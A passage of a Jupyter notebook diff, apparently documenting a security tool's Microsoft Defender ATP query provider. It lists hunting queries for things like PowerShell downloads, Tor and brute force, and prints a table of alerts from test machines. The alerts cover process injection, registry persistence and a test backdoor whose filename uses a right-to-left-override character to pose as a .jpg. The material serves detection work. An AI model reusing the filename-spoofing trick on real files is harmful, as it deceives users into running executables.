+       " 'MDATPHunting.accessibility_persistence',\n",
+       " 'MDATPHunting.av_sites',\n",
+       " 'MDATPHunting.b64_pe',\n",
+       " 'MDATPHunting.brute_force',\n",
+       " 'MDATPHunting.cve_2018_1000006l',\n",
+       " 'MDATPHunting.cve_2018_1111',\n",
+       " 'MDATPHunting.cve_2018_4878',\n",
+       " 'MDATPHunting.doc_with_link',\n",
+       " 'MDATPHunting.dropbox_link',\n",
+       " 'MDATPHunting.email_link',\n",
+       " 'MDATPHunting.email_smartscreen',\n",
+       " 'MDATPHunting.malware_recycle',\n",
+       " 'MDATPHunting.network_scans',\n",
+       " 'MDATPHunting.powershell_downloads',\n",
+       " 'MDATPHunting.service_account_powershell',\n",
+       " 'MDATPHunting.smartscreen_ignored',\n",
+       " 'MDATPHunting.smb_discovery',\n",
+       " 'MDATPHunting.tor',\n",
+       " 'MDATPHunting.uncommon_powershell',\n",
+       " 'MDATPHunting.user_enumeration']"
+      ]
+     },
+     "execution_count": 9,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "mdatp_prov.list_queries()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Get details about avaliable queries:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 20,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Query:  list_connections\n",
+      "Data source:  MDATP\n",
+      "Retrieves list of network connections for a host\n",
+      "\n",
+      "Parameters\n",
+      "----------\n",
+      "add_query_items: str (optional)\n",
+      "    Additional query clauses\n",
+      "end: datetime (optional)\n",
+      "    Query end time\n",
+      "start: datetime (optional)\n",
+      "    Query start time\n",
+      "    (default value is: -30)\n",
+      "table: str (optional)\n",
+      "    Table name\n",
+      "    (default value is: NetworkCommunicationEvents  )\n",
+      "Query:\n",
+      " {table} | where EventTime >= datetime({start}) | where EventTime <= datetime({end}) {add_query_items}\n"
+     ]
+    }
+   ],
+   "source": [
+    "mdatp_prov.MDATP.list_alerts('?')"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Execute queries with default parameters:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 39,
+   "metadata": {
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>AlertId</th>\n",
+       "      <th>EventTime</th>\n",
+       "      <th>MachineId</th>\n",
+       "      <th>ComputerName</th>\n",
+       "      <th>Severity</th>\n",
+       "      <th>Category</th>\n",
+       "      <th>Title</th>\n",
+       "      <th>FileName</th>\n",
+       "      <th>SHA1</th>\n",
+       "      <th>RemoteUrl</th>\n",
+       "      <th>RemoteIP</th>\n",
+       "      <th>ReportId</th>\n",
+       "      <th>Table</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <td>0</td>\n",
+       "      <td>da637111553314888493_-215032980</td>\n",
+       "      <td>2019-12-08T17:22:37.8742974Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>notepad.exe</td>\n",
+       "      <td>b6d237154f2e528f0b503b58b025862d66b02b73</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>454</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>1</td>\n",
+       "      <td>da637111470533220658_-1814166510</td>\n",
+       "      <td>2019-12-05T12:34:34.7864124Z</td>\n",
+       "      <td>1e9f8f18585e70ef1f167fbf5e8bf7c3dccc5739</td>\n",
+       "      <td>olaa-win10pro-1607</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>044a0cf1f6bc478a7172bf207eef1e201a18ba02</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>4369</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>2</td>\n",
+       "      <td>da637111470533220658_-1814166510</td>\n",
+       "      <td>2019-12-05T12:34:34.7864124Z</td>\n",
+       "      <td>1e9f8f18585e70ef1f167fbf5e8bf7c3dccc5739</td>\n",
+       "      <td>olaa-win10pro-1607</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>cmd.exe</td>\n",
+       "      <td>99ae9c73e9bee6f9c76d6f4093a9882df06832cf</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>4369</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>3</td>\n",
+       "      <td>da637111448595540767_-885088719</td>\n",
+       "      <td>2019-12-05T12:11:25.5486226Z</td>\n",
+       "      <td>499bdd5330f78dc82d0051c8d7a9eb9d69f88333</td>\n",
+       "      <td>nestorw-win10pro-1803</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>1b3b40fbc889fd4c645cc12c85d0805ac36ba254</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>14968</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>4</td>\n",
+       "      <td>da637111448595540767_-885088719</td>\n",
+       "      <td>2019-12-05T12:11:25.5486226Z</td>\n",
+       "      <td>499bdd5330f78dc82d0051c8d7a9eb9d69f88333</td>\n",
+       "      <td>nestorw-win10pro-1803</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>cmd.exe</td>\n",
+       "      <td>3ce71813199abae99348f61f0caa34e2574f831c</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>14968</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>5</td>\n",
+       "      <td>da637111835325717564_-1865655676</td>\n",
+       "      <td>2019-12-05T16:05:46.4778106Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>36c5d12033b2eaf251bae61c00690ffb17fddc87</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>2376</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>6</td>\n",
+       "      <td>da637111835325717564_-1865655676</td>\n",
+       "      <td>2019-12-05T16:05:46.4778106Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>notepad.exe</td>\n",
+       "      <td>d487580502354c61808c7180d1a336beb7ad4624</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>2376</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>7</td>\n",
+       "      <td>da637111691253610692_623907060</td>\n",
+       "      <td>2019-12-05T16:50:16.9477916Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>36c5d12033b2eaf251bae61c00690ffb17fddc87</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>915</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>8</td>\n",
+       "      <td>da637111691253610692_623907060</td>\n",
+       "      <td>2019-12-05T16:50:16.9477916Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>cmd.exe</td>\n",
+       "      <td>8dca9749cd48d286950e7a9fa1088c937cbccad4</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>915</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>9</td>\n",
+       "      <td>da637111691236503999_-1316647445</td>\n",
+       "      <td>2019-12-05T16:56:18.6397738Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>RuntimeBroker.exe</td>\n",
+       "      <td>7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1190</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>10</td>\n",
+       "      <td>da637111691236503999_-1316647445</td>\n",
+       "      <td>2019-12-05T16:56:18.6397738Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>RuntimeBroker.exe</td>\n",
+       "      <td>7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1190</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>11</td>\n",
+       "      <td>da637111691236503999_-1316647445</td>\n",
+       "      <td>2019-12-05T16:56:18.6397738Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>RuntimeBroker.exe</td>\n",
+       "      <td>7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1190</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>12</td>\n",
+       "      <td>da637111691236503999_-1316647445</td>\n",
+       "      <td>2019-12-05T16:56:18.6397738Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>WinATP-Intro-Backdoor‮gpj.exe</td>\n",
+       "      <td>79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1190</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>13</td>\n",
+       "      <td>da637111691251815824_2024877765</td>\n",
+       "      <td>2019-12-05T16:56:18.6407635Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Persistence</td>\n",
+       "      <td>Anomaly detected in ASEP registry</td>\n",
+       "      <td>WinATP-Intro-Backdoor‮gpj.exe</td>\n",
+       "      <td>79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1187</td>\n",
+       "      <td>RegistryEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>14</td>\n",
+       "      <td>da637111691256543941_-1462732472</td>\n",
+       "      <td>2019-12-05T16:56:18.6407635Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Persistence</td>\n",
+       "      <td>An uncommon file was created and added to a Ru...</td>\n",
+       "      <td>WinATP-Intro-Backdoor‮gpj.exe</td>\n",
+       "      <td>79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1187</td>\n",
+       "      <td>RegistryEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>15</td>\n",
+       "      <td>da637111691246094719_-1324223004</td>\n",
+       "      <td>2019-12-05T16:56:18.6685765Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>EAF violation blocked by exploit protection</td>\n",
+       "      <td>RuntimeBroker.exe</td>\n",
+       "      <td>7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1191</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>16</td>\n",
+       "      <td>da637111618734194967_-707278866</td>\n",
+       "      <td>2019-12-05T16:56:18.8702258Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Low</td>\n",
+       "      <td>Malware</td>\n",
+       "      <td>An active 'Artoelo' malware was detected</td>\n",
+       "      <td>WinATP-Intro-Backdoor‮gpj.exe</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1200</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>17</td>\n",
+       "      <td>da637111691251004475_-451474344</td>\n",
+       "      <td>2019-12-05T16:56:19.0725178Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Malware</td>\n",
+       "      <td>'Artoelo' malware was detected</td>\n",
+       "      <td>WinATP-Intro-Backdoor‮gpj.exe</td>\n",
+       "      <td>79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1194</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>18</td>\n",
+       "      <td>da637111691511319089_701653122</td>\n",
+       "      <td>2019-12-05T17:01:20.0899859Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>SuspiciousActivity</td>\n",
+       "      <td>A suspicious file was observed</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>36c5d12033b2eaf251bae61c00690ffb17fddc87</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1449</td>\n",
+       "      <td>FileCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>19</td>\n",
+       "      <td>da637111691521375847_1538423732</td>\n",
+       "      <td>2019-12-05T17:01:20.0899859Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>Suspicious behavior by cmd.exe was observed</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>36c5d12033b2eaf251bae61c00690ffb17fddc87</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1449</td>\n",
+       "      <td>FileCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>20</td>\n",
+       "      <td>da637111691521375847_1538423732</td>\n",
+       "      <td>2019-12-05T17:12:41.4195893Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>Suspicious behavior by cmd.exe was observed</td>\n",
+       "      <td>WindowsDefenderAtpProvisioningService.exe</td>\n",
+       "      <td>2f5a566429f0df02dd0dfb45be075531f332a887</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1960</td>\n",
+       "      <td>FileCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>21</td>\n",
+       "      <td>da637111691511319089_701653122</td>\n",
+       "      <td>2019-12-05T17:12:41.4195893Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>SuspiciousActivity</td>\n",
+       "      <td>A suspicious file was observed</td>\n",
+       "      <td>WindowsDefenderAtpProvisioningService.exe</td>\n",
+       "      <td>2f5a566429f0df02dd0dfb45be075531f332a887</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1960</td>\n",
+       "      <td>FileCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>22</td>\n",
+       "      <td>da637111691521375847_1538423732</td>\n",
+       "      <td>2019-12-05T17:12:41.4195893Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>Suspicious behavior by cmd.exe was observed</td>\n",
+       "      <td>cmd.exe</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1960</td>\n",
+       "      <td>FileCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>23</td>\n",
+       "      <td>da637111691236503999_-1316647445</td>\n",
+       "      <td>2019-12-05T17:12:43.2754844Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>WinATP-Intro-Backdoor‮gpj.exe</td>\n",
+       "      <td>79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1972</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>24</td>\n",
+       "      <td>da637111691236503999_-1316647445</td>\n",
+       "      <td>2019-12-05T17:12:43.2754844Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>RuntimeBroker.exe</td>\n",
+       "      <td>7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1972</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>25</td>\n",
+       "      <td>da637111691236503999_-1316647445</td>\n",
+       "      <td>2019-12-05T17:12:43.2754844Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>RuntimeBroker.exe</td>\n",
+       "      <td>7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1972</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>26</td>\n",
+       "      <td>da637111691236503999_-1316647445</td>\n",
+       "      <td>2019-12-05T17:12:43.2754844Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>RuntimeBroker.exe</td>\n",
+       "      <td>7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1972</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>27</td>\n",
+       "      <td>da637111691236503999_-1316647445</td>\n",
+       "      <td>2019-12-05T17:12:43.2754844Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>RuntimeBroker.exe</td>\n",
+       "      <td>7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1972</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>28</td>\n",
+       "      <td>da637111691236503999_-1316647445</td>\n",
+       "      <td>2019-12-05T17:12:43.2754844Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>WinATP-Intro-Backdoor‮gpj.exe</td>\n",
+       "      <td>79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1972</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>29</td>\n",
+       "      <td>da637111691251815824_2024877765</td>\n",
+       "      <td>2019-12-05T17:12:43.2822557Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Persistence</td>\n",
+       "      <td>Anomaly detected in ASEP registry</td>\n",
+       "      <td>WinATP-Intro-Backdoor‮gpj.exe</td>\n",
+       "      <td>79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1970</td>\n",
+       "      <td>RegistryEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>30</td>\n",
+       "      <td>da637111691256543941_-1462732472</td>\n",
+       "      <td>2019-12-05T17:12:43.2822557Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Persistence</td>\n",
+       "      <td>An uncommon file was created and added to a Ru...</td>\n",
+       "      <td>WinATP-Intro-Backdoor‮gpj.exe</td>\n",
+       "      <td>79c3e3cffcf57dd9913a605d5e55b2fdb8ebc4dc</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>1970</td>\n",
+       "      <td>RegistryEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>31</td>\n",
+       "      <td>da637111536085551266_1012263407</td>\n",
+       "      <td>2019-12-05T14:38:34.3208724Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>6cbce4a295c163791b60fc23d285e6d84f28ee4c</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>45</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>32</td>\n",
+       "      <td>da637111536085551266_1012263407</td>\n",
+       "      <td>2019-12-05T14:38:34.3208724Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>cmd.exe</td>\n",
+       "      <td>8c5437cd76a89ec983e3b364e219944da3dab464</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>45</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>33</td>\n",
+       "      <td>da637111553314888493_-215032980</td>\n",
+       "      <td>2019-12-05T15:06:20.3372768Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>6cbce4a295c163791b60fc23d285e6d84f28ee4c</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>256</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>34</td>\n",
+       "      <td>da637111553314888493_-215032980</td>\n",
+       "      <td>2019-12-05T15:06:20.3372768Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>notepad.exe</td>\n",
+       "      <td>b6d237154f2e528f0b503b58b025862d66b02b73</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>256</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>35</td>\n",
+       "      <td>da637111553314888493_-215032980</td>\n",
+       "      <td>2019-12-05T15:22:44.3072402Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>6cbce4a295c163791b60fc23d285e6d84f28ee4c</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>368</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>36</td>\n",
+       "      <td>da637111553314888493_-215032980</td>\n",
+       "      <td>2019-12-05T15:22:44.3072402Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>DefenseEvasion</td>\n",
+       "      <td>Suspicious process injection observed</td>\n",
+       "      <td>notepad.exe</td>\n",
+       "      <td>b6d237154f2e528f0b503b58b025862d66b02b73</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>368</td>\n",
+       "      <td>MiscEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>37</td>\n",
+       "      <td>da637111553314888493_-215032980</td>\n",
+       "      <td>2019-12-05T16:02:02.3857966Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
